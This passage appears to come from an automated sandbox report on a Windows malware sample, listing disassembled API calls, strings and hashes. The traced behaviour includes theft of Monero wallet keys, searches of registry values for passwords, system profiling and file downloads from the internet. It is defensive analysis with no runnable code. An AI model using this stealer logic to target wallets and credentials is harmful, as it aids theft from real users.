                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 348468850-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                                                                        • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                        • API String ID: 2054947926-218353709
                                                                                                                                                                                                                                                                                        • Opcode ID: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                                                                        • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
  • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
  • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
  • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
  • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
  • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
• lstrcat.KERNEL32(36B6C020,0041DEB8), ref: 00406FD6
• lstrcat.KERNEL32(36B6C020,00000000), ref: 00407018
• lstrcat.KERNEL32(36B6C020, : ), ref: 0040702A
• lstrcat.KERNEL32(36B6C020,00000000), ref: 0040705F
• lstrcat.KERNEL32(36B6C020,0041DEC0), ref: 00407070
• lstrcat.KERNEL32(36B6C020,00000000), ref: 004070A3
• lstrcat.KERNEL32(36B6C020,0041DEC4), ref: 004070BD
• task.LIBCPMTD ref: 004070CB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
Yara matches
Similarity
• API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
• String ID: : $`v@$h0A
• API String ID: 3191641157-3559972273
• Opcode ID: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
• Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
• Opcode Fuzzy Hash: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
• Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
Yara matches
Similarity
• API ID:
• String ID: image/jpeg
• API String ID: 0-3785015651
• Opcode ID: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
• Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
• Opcode Fuzzy Hash: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
• Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
• RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
• InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
• InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
• InternetCloseHandle.WININET(c.A), ref: 00404D75
• InternetCloseHandle.WININET(?), ref: 00404D82
Strings
Memory Dump Source
• Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
• String ID: c.A$c.A
• API String ID: 3066467675-270182787
• Opcode ID: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
• Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
• Opcode Fuzzy Hash: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
• Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00406CE4
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
• GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
• HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                                                          • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                                                                        • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                                                        • String ID: Password
                                                                                                                                                                                                                                                                                        • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                                                                        • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                                                        • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                                                        • String ID: :$C$\
                                                                                                                                                                                                                                                                                        • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                                                        • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                                                                                        • String ID: '@$'@
                                                                                                                                                                                                                                                                                        • API String ID: 1815715184-345573653
                                                                                                                                                                                                                                                                                        • Opcode ID: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                                                                        • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04406340,00000000,?,0041D774,00000000,?,00000000,00000000,?,044062B0), ref: 0041496D
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                        • String ID: %d MB$@
                                                                                                                                                                                                                                                                                        • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                                                                        • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                                                        • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 00405DE7
                                                                                                                                                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2507841554-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                                                                        • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                                                                        • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                                                                        • Opcode ID: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
